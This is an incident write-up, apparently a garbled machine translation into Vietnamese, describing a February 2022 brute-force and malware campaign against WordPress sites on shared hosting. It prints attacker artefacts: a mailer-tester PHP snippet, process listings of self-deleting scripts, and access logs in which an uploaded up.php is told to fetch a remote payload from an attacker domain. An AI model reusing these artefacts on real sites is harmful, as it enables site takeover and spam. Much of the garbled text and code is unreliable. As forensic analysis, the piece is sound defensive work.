Hack WordPress 2022

Hệ thống quản lý nội dung [CMS] được sử dụng rộng rãi, chẳng hạn như Wordpress, Joomla, Drupal và các hệ thống khác là mục tiêu đáng hoan nghênh cho các nỗ lực hack. Thỉnh thoảng, một CMS như vậy lại bị tấn công - chủ yếu là do khai thác lỗ hổng. Trong hầu hết các trường hợp, người đáng trách thực sự là quản trị viên trang web/quản trị viên trang web của CMS bị ảnh hưởng. Để một ứng dụng web chưa được vá cũng giống như không bao giờ vá Hệ điều hành - với bề mặt tấn công thậm chí còn dễ dàng hơn

Nhiều khai thác lỗ hổng mới được phát hành

Trong vài ngày qua [tháng 2 năm 2022], nhiều lỗ hổng Wordpress mới đã được công khai, bao gồm các tập lệnh và bằng chứng về khái niệm cách khai thác các lỗ hổng này.  

Cuộc tấn công vũ phu quy mô lớn vào ngày 16 tháng 2

Vào tối ngày 16 tháng 2, chúng tôi đã phát hiện ra một lượng lớn yêu cầu trên máy chủ lưu trữ chia sẻ của khách hàng. Đầu tiên chúng tôi nghi ngờ một cuộc tấn công DOS, bắt nguồn từ một dải mạng ở Tây Ban Nha [37. 120. 142. 0/24; . Nhưng xem xét kỹ hơn các yêu cầu cho thấy rằng không chỉ một trang web bị nhắm mục tiêu - nhiều tên miền khác nhau đã bị tấn công cùng một lúc. Tất cả các trang web đều có một điểm chung. Tất cả đều sử dụng Wordpress

Từ trạng thái máy chủ của Apache

80-1  9461  0/525/1584   W 1. 02 0    0     0. 0  2. 60  9. 07   37. 120. 142. 25  http/1. 1 ví dụ1. com. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
83-1  23169 0/1025/2339  W 2. 17 1    0     0. 0  5. 76  16. 72  37. 120. 142. 25  http/1. 1 ví dụ2. de. 7081   ĐĂNG //xmlrpc. php HTTP/1. 0
84-1  23213 0/304/1363   W 0. 62 12   0     0. 0  1. 47  7. 12   37. 120. 142. 25  http/1. 1 ví dụ3. ch. 7081   ĐĂNG //xmlrpc. php HTTP/1. 0
87-1  17995 0/399/3266   W 0. 89 2    0     0. 0  2. 58  22. 49  37. 120. 142. 25  http/1. 1 ví dụ4. bọc lưới. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
88-1  21627 0/343/1436   W 0. 74 0    0     0. 0  1. 71  7. 06   37. 120. 142. 25  http/1. 1 ví dụ5. ch. 7081   ĐĂNG //xmlrpc. php HTTP/1. 0
89-1  3896  0/28/846     W 0. 28 4    0     0. 0  0. 11  5. 05   37. 120. 142. 25  http/1. 1 ví dụ6. ch. 7081   ĐĂNG //xmlrpc. php HTTP/1. 0
90-1  31157 0/151/1285   W 0. 31 10   0     0. 0  0. 62  6. 26   37. 120. 142. 25  http/1. 1 ví dụ7. ch. 7081   ĐĂNG //xmlrpc. php HTTP/1. 0
94-1  9471  0/560/846    W 1. 20 2    0     0. 0  2. 98  4. 59   37. 120. 142. 25  http/1. 1 ví dụ8. bọc lưới. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
95-1  3906  0/28/648     _ 0. 05 0    4536  0. 0  0. 09  3. 45   37. 120. 142. 25  http/1. 1 ví dụ4. bọc lưới. 7080  ĐĂNG /xmlrpc. php HTTP/1. 0
96-1  18000 0/373/898    W 0. 76 3    0     0. 0  2. 28  4. 95   37. 120. 142. 25  http/1. 1 ví dụ9. com. 7081  POST //wp-đăng nhập. php HTTP/1. 0
97-1  28399 0/831/837    W 1. 69 2    0     0. 0  4. 69  4. 71   37. 120. 142. 25  http/1. 1 ví dụ14. ch. 7081  POST //wp-đăng nhập. php HTTP/1. 0
100-1 18002 0/409/800    W 0. 77 3    0     0. 0  2. 62  4. 60   37. 120. 142. 25  http/1. 1 ví dụ15. ch. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
101-1 23244 0/287/837    W 0. 59 3    0     0. 0  1. 22  4. 21   37. 120. 142. 25  http/1. 1 ví dụ14. ch. 7081  POST //wp-đăng nhập. php HTTP/1. 0
102-1 21632 0/333/808    W 0. 62 2    0     0. 0  2. 01  6. 11   37. 120. 142. 25  http/1. 1 ví dụ9. com. 7081  POST //wp-đăng nhập. php HTTP/1. 0
104-1 9498  0/567/866    W 1. 18 5    0     0. 0  3. 07  4. 70   37. 120. 142. 25  http/1. 1 ví dụ10. com. 7080 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
106-1 3915  0/23/759     W 0. 11 1    0     0. 0  0. 10  5. 48   37. 120. 142. 25  http/1. 1 ví dụ11. ch. 7080  ĐĂNG //xmlrpc. php HTTP/1. 0
108-1 3917  0/29/588     W 0. 07 10   0     0. 0  0. 12  4. 67   37. 120. 142. 25  http/1. 1 ví dụ12. ch. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
109-1 3918  0/21/691     W 0. 07 1    0     0. 0  0. 10  4. 50   37. 120. 142. 25  http/1. 1 ví dụ10. com. 7080 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
113-1 3923  0/19/546     W 0. 06 0    0     0. 0  0. 11  3. 97   37. 120. 142. 25  http/1. 1 ví dụ13. ch. 7080  ĐĂNG //xmlrpc. php HTTP/1. 0
115-1 12306 0/510/725    W 1. 08 10   0     0. 0  2. 76  4. 13   37. 120. 142. 25  http/1. 1 ví dụ16. ch. 708   ĐĂNG //xmlrpc. php HTTP/1. 0
116-1 18771 0/374/709    W 0. 71 3    0     0. 0  2. 28  4. 37   37. 120. 142. 25  http/1. 1 ví dụ17. ch. 7081  POST //wp-đăng nhập. php HTTP/1. 0
117-1 9507  0/566/716    W 1. 24 8    0     0. 0  3. 24  4. 20   37. 120. 142. 25  http/1. 1 ví dụ18. ch. 7081  POST //wp-đăng nhập. php HTTP/1. 0
118-1 9512  0/554/739    W 1. 16 10   0     0. 0  2. 96  3. 85   37. 120. 142. 25  http/1. 1 ví dụ19. ch. 7081  POST //wp-đăng nhập. php HTTP/1. 0
120-1 3925  0/33/529     W 0. 09 0    0     0. 0  0. 13  2. 69   37. 120. 142. 25  http/1. 1 ví dụ20. com. 7081 BÀI ĐĂNG //xmlrpc. php HTTP/1. 0
121-1 9517  0/578/688    W 1. 10 2    0     0. 0  3. 69  4. 34   37. 120. 142. 25  http/1. 1 ví dụ4. bọc lưới. 7081  BÀI ĐĂNG //xmlrpc. php HTTP/1. 0

Gửi yêu cầu POST lớn tới wp-login. php và xmlrpc. php thường chỉ ra một cuộc tấn công vũ phu đang cố gắng tìm các kết hợp thông tin xác thực chính xác. Cả hai tập lệnh này [theo mặc định] không có bất kỳ kết nối hoặc giới hạn số lần đăng nhập sai nào do đó chúng là mục tiêu đáng hoan nghênh cho các cuộc tấn công này

Ghi chú. Xem bài viết liên quan cách bảo vệ blog Wordpress của bạn khỏi các cuộc tấn công đăng nhập vũ phu

Các cuộc tấn công vũ phu như vậy xảy ra thường xuyên trên một trang Wordpress - nhưng quy mô của cuộc tấn công này khiến chúng tôi ngạc nhiên. Kẻ tấn công phải có sẵn cơ sở dữ liệu cài đặt Wordpress [toàn cầu]

Ở đỉnh điểm của cuộc tấn công, cuộc tấn công đã sử dụng băng thông ~13MB/s [= 104 Mbit/s]

Tất nhiên, chúng tôi đã chặn các cuộc tấn công ngay khi chúng tôi [giám sát của chúng tôi] phát hiện ra chúng, nhưng liệu kẻ tấn công có thành công hay không thì chỉ có thời gian mới trả lời được.

ngày hôm sau. Một số cài đặt Wordpress bị ảnh hưởng

Ngày hôm sau, chúng tôi tìm thấy một vài cài đặt Wordpress đã bị tấn công. Bằng cách khai thác lỗ hổng hoặc bằng cách tìm tổ hợp đăng nhập chính xác từ cuộc tấn công vũ phu. Nhưng vụ hack thành công dẫn đến nhiều tình huống khác nhau, cách truy cập đã cố gắng được sử dụng.  

trường hợp cổ điển. gửi thư rác

Tất nhiên, gửi thư rác luôn là một trong những mục tiêu. Đặc biệt nếu máy chủ không nằm trong bất kỳ danh sách đen nào, điều này mang lại cho máy chủ độ tin cậy [smtp] cao hơn - nhưng nó cũng thú vị hơn đối với những kẻ gửi thư rác. Trên một lần cài đặt Wordpress, chúng tôi đã tìm thấy các tệp đã tải lên có chứa phần mềm độc hại Leaf PHP Mailer. Tập lệnh PHP này được biết đến với việc gửi hàng loạt e-mail và thậm chí bao gồm kiểm tra DNSBL

root@server ~ # ll /var/www/vhosts/example4. net/httpdocs/miền/unz. php
-rw-r--r-- 1 ví dụ4 psacln 166104 17 tháng 2 06. 32 /var/www/vhosts/example4. net/httpdocs/miền/unz. php

root@server ~ # thêm /var/www/vhosts/example4. net/httpdocs/miền/unz. php
/**
 * Leaf PHP Mailer của [leafmailer. pw]
 * @version. 2. 8
**/

$mật khẩu = "";

Trước khi tải lên unz. php, một tập lệnh PHP khác [người kiểm tra. php] đã được tải lên để kiểm tra khả năng gửi e-mail

root@server # người kiểm tra chỉ số. php
  Tệp. kiểm thử. php
  Kích thước. 796           Khối. 8          Khối IO. 4096   tệp thông thường
Thiết bị. fe02h/65026d    Inode. 53901849    Liên kết. 1
Quyền truy cập. [0644/-rw-r--r--]  Uid. [10026/  ví dụ4]   Gid. [ 1005/  psacln]
Quyền truy cập. 2022-02-17 02. 46. 03. 546900843 +0100
Sửa đổi. 2022-02-17 02. 45. 59. 195004007 +0100
Thay đổi. 2022-02-17 02. 45. 59. 195004007 +0100
 Sinh. -

root@server # người kiểm tra mèo. php
error_reporting[0];
echo '
 

Trình kiểm tra gửi email

Trình kiểm tra gửi email
Viết email của bạn và nhấp vào gửi kiểm tra email







';
if [isset[ . ". $rnd , "ĐANG LÀM VIỆC. "];
{
    $rnd = rand[];
    mail[$_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!"];
    in "Email được gửi đến. ". $_POST['email']. ", ID báo cáo. ". $rnd. "";
}

By analyzing how tester. php appeared on the server, yet another file [local. php] was detected. Looking closer at it revealed it's a [beautiful] web shell

Once such a web shell is on the server, it's very easy for an attacker to upload additional and manipulate and delete existing files.
But when did this web shell get on the server? Another analysis showed it was uploaded on February 16th, during the mass attack.

root@server # ls -l local. php
-rw-r--r-- 1 example4 psacln 39507 Feb 16 22. 01 local. php

Obviously the attack on February 16h was not only a brute-force attack. The attack also involved exploiting vulnerabilities and uploading new files [such as web shells]

Another case. Launching [loop] scripts

A rather rare case is the execution of scripts which keep running as a process. This was also detected following the attacks on February 16

root@server ~ # ps auxf. khóa grep360. php
root      6814  0. 0  0. 0   6076   832 pts/6    S+   08. 37   0. 00                      \_ grep --color=auto lock360. php
10207    10279  0. 0  0. 0 361172 38688 ?        S    07. 33   0. 03      \_ /opt/plesk/php/7. 3/bin/php /var/www/vhosts/example8. net/httpdocs/wp-admin/css/colors/blue/lock360. php

Bằng cách sử dụng strace trên PID, chúng ta có thể thấy rằng tập lệnh đang chạy trong một vòng lặp, do đó giữ cho quá trình tồn tại

Interesting in this case was that the process was launched via HTTP

173. 208. 202. 234 - - [17/Feb/2022. 07. 33. 54 +0100] "GET /wp-admin/css/colors/blue/lock360. php?action=lock HTTP/1. 0" 200 1044 "http. //example8. net/wp-admin/css/colors/blue/lock360. php?action=check" "Mozilla/5. 0 [Windows NT 6. 3; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/98. 0. 4758. 102 Safari/537. 36"

This seems to start the process but at the same time deleted the file itself - which removes it from the filesystem, however it is kept in memory by the running process

Other similar processes were detected on the system, all with similar names

example19  2777  0. 0  0. 0 361108 36436 ?        S    04. 45   0. 03 /opt/plesk/php/7. 3/bin/php /var/www/vhosts/example19. ch/httpdocs/l. php
example2   5442  0. 0  0. 0 376740 41028 ?        S    06. 36   0. 01 /opt/plesk/php/5. 6/bin/php /var/www/vhosts/example2. de/httpdocs/lock666. php

Unfortunately as the files were removed from the file system as soon as they are launched, we could not analyze it. But we believe the purpose of these processes was to attack other remote servers

Update. We REALLY wanted to find out, what the process is doing, so we went into deep-dive analysis. In our next article, we share our technical analysis of a deleted script running as a process and reading its PHP code from memory

Downloading additional scripts

Another way a hacked Wordpress can be abused, is to use the malicious files to download additional files from a remote source. Here nicely seen by using an uploaded script [up. php]

62. 201. 241. 20 - - [16/02/2022. 22. 20. 38 +0100] "GET /wp-content/plugins/patixrzkax/up. php HTTP/1. 0" 200 576 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"
62. 201. 241. 20 - - [16/Feb/2022. 22. 26. 58 +0100] "POST /wp-content/plugins/patixrzkax/up. php?php=anonymousfox. is/__@v6PnSVM/p1. txt HTTP/1. 0" 200 603 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"
62. 201. 241. 20 - - [16/Feb/2022. 22. 27. 01 +0100] "POST /wp-content/plugins/patixrzkax/up. php?php=anonymousfox. is/__@v6PnSVM/p1. txt HTTP/1. 0" 200 649 "yahoo. com" "Mozilla/5. 0 [Windows NT 10. 0; Win64; x64] AppleWebKit/537. 36 [KHTML, like Gecko] Chrome/90. 0. 4430. 85 Safari/537. 36"

Điều đặc biệt khó chịu ở đây là thực tế rằng tên miền ẩn danhfox. được lưu trữ phía sau proxy CloudFlare. Có thể chặn các yêu cầu gửi đi đến phạm vi Cloudflare, nhưng các ứng dụng khác [đang hoạt động và hợp pháp] cũng có thể bị ảnh hưởng.

Phát hiện lỗ hổng Wordpress

May mắn thay, có sẵn một số trình quét lỗ hổng [mã nguồn mở] rất tốt, giúp bạn phát hiện ra bất kỳ lỗ hổng Wordpress [đã biết] nào. Một trong những trình quét được sử dụng nhiều nhất là wpscan, một trình quét tốt khác là Pompem. Mặc dù cái sau không được cập nhật trong nhiều năm, nhưng nó vẫn hoạt động để phát hiện các lỗ hổng gần đây

Ở đây chúng tôi cho phép pompem chạy trên một trong những trang Wordpress bị ảnh hưởng

root@server /var/www/vhosts/example19. ch/httpdocs # pompem -s Wordpress
[. ]
+Kết quả Wordpress
+----------------------- . Trình tạo hồ sơ WordPress Cozmoslabs 3. 6. 1 Chéo S. https. //packetstormbảo mật. com/files/166029/WordPress-Cozmoslabs-Profile-Builder-3. 6. 1-Cross-Site-Scripting. html
+Date            Description                                     Url
+----------------------------------------------------------------------------------------------------+
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | //packetstormsecurity.com/files/166029/WordPress-Cozmoslabs-Profile-Builder-3.6.1-Cross-Site-Scripting.html
+--------------------------------------- . WordPress Error Log Viewer 1. 1. 1 tập tin De tùy ý. https. //packetstormsecurity. com/files/165985/WordPress-Error-Log-Viewer-1. 1. 1-Arbitrary-File-Deletion. html
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | //packetstormsecurity.com/files/165985/WordPress-Error-Log-Viewer-1.1.1-Arbitrary-File-Deletion.html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-14 . WordPress International SMS For Contact Form 7 Int . https. //packetstormsecurity. com/files/165969/WordPress-International-SMS-For-Contact-Form-7-Integration-1. 2-CSRF. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress VeronaLabs WP Statistics 13. 1. 4 SQL Inje . https. //packetstormsecurity. com/files/165949/WordPress-VeronaLabs-WP-Statistics-13. 1. 4-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress Secure Copy Content Protection And Conte . https. //packetstormsecurity. com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2. 8. 1-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress Jetpack 9. 1 Cross Site Scripting . https. //packetstormsecurity. com/files/165942/WordPress-Jetpack-9. 1-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-10 . WordPress 5. 9 Cross Site Scripting . https. //packetstormsecurity. com/files/165940/WordPress-5. 9-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Simple Job Board 2. 9. 3 Local File Inclus . https. //packetstormsecurity. com/files/165892/WordPress-Simple-Job-Board-2. 9. 3-Local-File-Inclusion. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Contact Form Builder 1. 6. 1 trang chéo Sc. https. //packetstormsecurity. com/files/165889/WordPress-Contact-Form-Builder-1. 6. 1-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress CP Blocks 1. 0. 14 Cross Site Scripting . https. //packetstormsecurity. com/files/165887/WordPress-CP-Blocks-1. 0. 14-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-08 . WordPress Security Audit 1. 0. 0 Cross Site Scriptin . https. //packetstormsecurity. com/files/165886/WordPress-Security-Audit-1. 0. 0-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-07 . WordPress International SMS For Contact Form 7 Int . https. //packetstormsecurity. com/files/165883/WordPress-International-SMS-For-Contact-Form-7-Integration-1. 2-XSS. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-04 . WordPress IP2Location Country Blocker 2. 26. 7 Cross . https. //packetstormsecurity. com/files/165857/WordPress-IP2Location-Country-Blocker-2. 26. 7-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-02-02 . WordPress Learnpress 4. 1. 4. 1 Arbitrary Image Renam . https. //packetstormsecurity. com/files/165825/WordPress-Learnpress-4. 1. 4. 1-Đổi tên hình ảnh tùy ý. html
+--------------------------------------- . Trình kiểm tra biểu mẫu liên hệ WordPress 1. 0. 2 XSS / Ac. https. //packetstormbảo mật. com/files/165814/WordPress-Contact-Form-Check-Tester-1. 0. 2-XSS-Kiểm soát truy cập. html
+ 2022-02-02 | WordPress Contact Form Check Tester 1.0.2 XSS / Ac | //packetstormsecurity.com/files/165814/WordPress-Contact-Form-Check-Tester-1.0.2-XSS-Access-Control.html
+--------------------------------------- . Kiểm tra tên miền WordPress 1. 0. 16 Tập lệnh chéo trang. https. //packetstormbảo mật. com/files/165811/WordPress-Domain-Check-1. 0. 16-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Domain Check 1.0.16 Cross Site Scripting | //packetstormsecurity.com/files/165811/WordPress-Domain-Check-1.0.16-Cross-Site-Scripting.html
+--------------------------------------- . Màn hình tải xuống WordPress WordPress 4. 4. 4 lệnh SQL. https. //packetstormbảo mật. com/files/165809/WordPress-Download-Monitor-WordPress-4. 4. 4-SQL-Tiêm. html
+ 2022-02-02 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | //packetstormsecurity.com/files/165809/WordPress-Download-Monitor-WordPress-4.4.4-SQL-Injection.html
+--------------------------------------- . Thanh trượt sản phẩm WordPress cho WooC Commerce 1. 13. 21C. https. //packetstormbảo mật. com/files/165805/WordPress-Product-Slider-For-WooC Commerce-1. 13. 21-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Product Slider For WooCommerce 1.13.21 C | //packetstormsecurity.com/files/165805/WordPress-Product-Slider-For-WooCommerce-1.13.21-Cross-Site-Scripting.html
+--------------------------------------- . Lưới bài đăng WordPress 2. 1. 1 Tập lệnh chéo trang. https. //packetstormbảo mật. com/files/165804/WordPress-Post-Grid-2. 1. 1-Cross-Site-Scripting. html
+ 2022-02-02 | WordPress Post Grid 2.1.1 Cross Site Scripting | //packetstormsecurity.com/files/165804/WordPress-Post-Grid-2.1.1-Cross-Site-Scripting.html
+--------------------------------------- . WordPress 404 đến 301 2. 0. 2 SQL tiêm. https. //packetstormbảo mật. com/files/165803/WordPress-404-To-301-2. 0. 2-SQL-Tiêm. html
+ 2022-02-02 | WordPress 404 To 301 2.0.2 SQL Injection | //packetstormsecurity.com/files/165803/WordPress-404-To-301-2.0.2-SQL-Injection.html
+--------------------------------------- . Đăng ký WordPressMagic V 5. 0. 1. 5 Tiêm SQL. https. //packetstormbảo mật. com/files/165746/WordPress-RegistrationMagic-V-5. 0. 1. 5-SQL-Tiêm. html
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | //packetstormsecurity.com/files/165746/WordPress-RegistrationMagic-V-5.0.1.5-SQL-Injection.html
+--------------------------------------- . Lịch sự kiện WordPress hiện đại 6. 1 SQL Injection . https. //packetstormsecurity. com/files/165742/WordPress-Modern-Events-Calendar-6. 1-SQL-Injection. html
+ 2022-01-27 | WordPress Modern Events Calendar 6.1 SQL Injection | //packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-27 . WordPress Mortgage Calculators WP 1. 52 Cross Site  . https. //packetstormsecurity. com/files/165734/WordPress-Mortgage-Calculators-WP-1. 52-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-19 . WordPress Email Template Designer – WP HTML  . https. //packetstormsecurity. com/files/165606/WordPress-Email-Template-Designer-WP-HTML-Mail-3. 0. 9-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-13 . WordPress Core 5. 8. 2 SQL Injection . https. //packetstormsecurity. com/files/165540/WordPress-Core-5. 8. 2-SQL-Injection. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-12 . WordPress Frontend Uploader 1. 3. 2 Cross Site Scrip . https. //packetstormsecurity. com/files/165515/WordPress-Frontend-Uploader-1. 3. 2-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-10 . WordPress Contact Form Entries Cross Site Scriptin . https. //packetstormsecurity. com/files/165500/WordPress-Contact-Form-Entries-Cross-Site-Scripting. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 . WordPress Catch Themes Demo Import Shell Upload . https. //packetstormsecurity. com/files/165463/WordPress-Catch-Themes-Demo-Import-Shell-Upload. html
+----------------------------------------------------------------------------------------------------+
+ 2022-01-05 . WordPress AAWP 3. 16 Cross Site Scripting . https. //packetstormbảo mật. com/tệp/165451/WordPress-AAWP-3. 16-Cross-Site-Scripting. html
+--------------------------------------- . WordPress Trình xếp hạng thực sự 2. 2. 2 Đọc tệp tùy ý. https. //packetstormbảo mật. com/files/165434/WordPress-The-True-Ranker-2. 2. 2-Đọc tệp tùy ý. html
+ 2022-01-05 | WordPress The True Ranker 2.2.2 Arbitrary File Rea | //packetstormsecurity.com/files/165434/WordPress-The-True-Ranker-2.2.2-Arbitrary-File-Read.html
+--------------------------------------- . Thống kê khách truy cập WordPress WP 4. 7 Tiêm SQL. https. //packetstormbảo mật. com/files/165433/WordPress-WP-Khách-Thống kê-4. 7-SQL-Tiêm. html
+ 2022-01-05 | WordPress WP Visitor Statistics 4.7 SQL Injection | //packetstormsecurity.com/files/165433/WordPress-WP-Visitor-Statistics-4.7-SQL-Injection.html
+--------------------------------------- . Trình tạo hồ sơ WordPress Cozmoslabs 3. 6. 1 Chéo S. https. //cxan ninh. com/issue/WLB-2022020089
+ 2022-02-17 | WordPress Cozmoslabs Profile Builder 3.6.1 Cross S | //cxsecurity.com/issue/WLB-2022020089
+--------------------------------- . Trình xem nhật ký lỗi WordPress 1. 1. 1 tập tin De tùy ý. https. //cxan ninh. com/issue/WLB-2022020073
+ 2022-02-16 | WordPress Error Log Viewer 1.1.1 Arbitrary File De | //cxsecurity.com/issue/WLB-2022020073
+--------------------------------- . WordPress International SMS For Contact Form 7 Int. https. //cxan ninh. com/issue/WLB-2022020069
+ 2022-02-15 | WordPress International SMS For Contact Form 7 Int | //cxsecurity.com/issue/WLB-2022020069
+--------------------------------- . Bảo vệ và bảo vệ nội dung sao chép an toàn WordPress. https. //cxan ninh. com/issue/WLB-2022020068
+ 2022-02-14 | WordPress Secure Copy Content Protection And Conte | //cxsecurity.com/issue/WLB-2022020068
+--------------------------------- . Plugin WordPress Post Grid 2. 1. 1 tập lệnh trang web chéo. https. //cxan ninh. com/issue/WLB-2022020063
+ 2022-02-14 | WordPress Plugin Post Grid 2.1.1 Cross Site Script | //cxsecurity.com/issue/WLB-2022020063
+--------------------------------- . Plugin CP khối WordPress 1. 0. 14 Ngồi Thập Tự. https. //cxan ninh. com/issue/WLB-2022020052
+ 2022-02-09 | WordPress Plugin CP Blocks 1.0.14 Stored Cross Sit | //cxsecurity.com/issue/WLB-2022020052
+--------------------------------- . Thanh trượt sản phẩm plugin WordPress cho WooC Commerce 1. . https. //cxan ninh. com/issue/WLB-2022020042
+ 2022-02-08 | WordPress Plugin Product Slider for WooCommerce 1. | //cxsecurity.com/issue/WLB-2022020042
+--------------------------------- . Khối CP WordPress 1. 0. 14 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020036
+ 2022-02-08 | WordPress CP Blocks 1.0.14 Cross Site Scripting | //cxsecurity.com/issue/WLB-2022020036
+--------------------------------- . Kiểm tra bảo mật WordPress 1. 0. 0 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020034
+ 2022-02-08 | WordPress Security Audit 1.0.0 Cross Site Scriptin | //cxsecurity.com/issue/WLB-2022020034
+--------------------------------- . Trình chặn quốc gia IP2Location WordPress 2. 26. 7 chữ thập. https. //cxan ninh. com/issue/WLB-2022020031
+ 2022-02-07 | WordPress IP2Location Country Blocker 2.26.7 Cross | //cxsecurity.com/issue/WLB-2022020031
+--------------------------------- . WordPress International SMS For Contact Form 7 Int. https. //cxan ninh. com/issue/WLB-2022020021
+ 2022-02-07 | WordPress International SMS For Contact Form 7 Int | //cxsecurity.com/issue/WLB-2022020021
+--------------------------------- . Lưới bài đăng WordPress 2. 1. 1 Tập lệnh chéo trang. https. //cxan ninh. com/issue/WLB-2022020018
+ 2022-02-04 | WordPress Post Grid 2.1.1 Cross Site Scripting | //cxsecurity.com/issue/WLB-2022020018
+--------------------------------- . Học WordPress 4. 1. 4. 1 Renam ảnh tùy ý. https. //cxan ninh. com/issue/WLB-2022020014
+ 2022-02-03 | WordPress Learnpress 4.1.4.1 Arbitrary Image Renam | //cxsecurity.com/issue/WLB-2022020014
+--------------------------------- . Màn hình tải xuống WordPress WordPress 4. 4. 4 lệnh SQL. https. //cxan ninh. com/issue/WLB-2022020013
+ 2022-02-03 | WordPress Download Monitor WordPress 4.4.4 SQL Inj | //cxsecurity.com/issue/WLB-2022020013
+--------------------------------- . Thanh trượt sản phẩm WordPress cho WooC Commerce 1. 13. 21C. https. //cxan ninh. com/issue/WLB-2022020012
+ 2022-02-03 | WordPress Product Slider For WooCommerce 1.13.21 C | //cxsecurity.com/issue/WLB-2022020012
+--------------------------------- . Plugin Wordpress 404 đến 301 2. 0. 2 SQL-Injection [A. https. //cxan ninh. com/issue/WLB-2022020005
+ 2022-02-02 | Wordpress Plugin 404 to 301 2.0.2 SQL-Injection [A | //cxsecurity.com/issue/WLB-2022020005
+--------------------------------- . Lịch sự kiện WordPress hiện đại 6. 1 lần tiêm SQL. https. //cxan ninh. com/issue/WLB-2022010143
+ 2022-01-28 | WordPress Modern Events Calendar 6.1 SQL Injection | //cxsecurity.com/issue/WLB-2022010143
+--------------------------------- . Đăng ký WordPressMagic V 5. 0. 1. 5 Tiêm SQL. https. //cxan ninh. com/issue/WLB-2022010135
+ 2022-01-27 | WordPress RegistrationMagic V 5.0.1.5 SQL Injectio | //cxsecurity.com/issue/WLB-2022010135
+--------------------------------- . Máy tính thế chấp WordPress WP 1. 52 Trang web chéo. https. //cxan ninh. com/issue/WLB-2022010131
+ 2022-01-27 | WordPress Mortgage Calculators WP 1.52 Cross Site  | //cxsecurity.com/issue/WLB-2022010131
+--------------------------------- . Plugin WordPress Thống kê khách truy cập WP 4. 7 lệnh SQL. https. //cxan ninh. com/issue/WLB-2022010098
+ 2022-01-18 | WordPress Plugin WP Visitor Statistics 4.7 SQL Inj | //cxsecurity.com/issue/WLB-2022010098
+---------------------------------

Mặc dù bản cài đặt Wordpress này đã được cập nhật [có thể là vào tháng 1 năm 2022 như đầu ra gợi ý], nhưng điều đó là không đủ để theo kịp các lỗ hổng gần đây. Bản cập nhật hàng tuần thực sự là bắt buộc đối với mọi cài đặt Wordpress. Nhưng như đã viết ở trên. Điều này phụ thuộc vào quản trị viên trang web có trách nhiệm

WordPress có dễ bị hack không?

Giống như tất cả các trang web, các trang web WordPress được lưu trữ trên một máy chủ web. Một số công ty lưu trữ không bảo mật đúng nền tảng lưu trữ của họ. Điều này làm cho tất cả các trang web được lưu trữ trên máy chủ của họ dễ bị tấn công .

WordPress 2022 có an toàn không?

WordPress là một nền tảng an toàn miễn là bạn tuân theo các phương pháp bảo mật tốt nhất . 97% tất cả các vi phạm bảo mật đều khai thác plugin WordPress, vì vậy đây không phải là CMS dễ bị tấn công. Bài viết này sẽ nêu bật các vấn đề bảo mật lớn nhất của WordPress trong năm 2022 và đề cập đến những gì Hostinger đang làm để giải quyết chúng.

Bao nhiêu phần trăm các trang web WordPress bị tấn công?

Bao nhiêu phần trăm trang web WordPress bị tấn công? . 3% 4.3% trang web WordPress được quét bằng SiteCheck [một trình quét bảo mật trang web phổ biến] vào năm 2021 đã bị tấn công [bị lây nhiễm]. Đó là khoảng 1 trên 25 trang web.

Các trang web WordPress bị tấn công thường xuyên như thế nào?

Điều có thể nói về thống kê hack WordPress là trung bình cứ sau 39 giây lại có một cuộc tấn công trên web, nhưng một cuộc tấn công không phải lúc nào cũng có nghĩa là một trang web bị tấn công. Trung bình có 30.000 trang web mới bị tấn công mỗi ngày và cách phổ biến nhất mà các trang web bị tấn công là bởi một công cụ tự động

Chủ Đề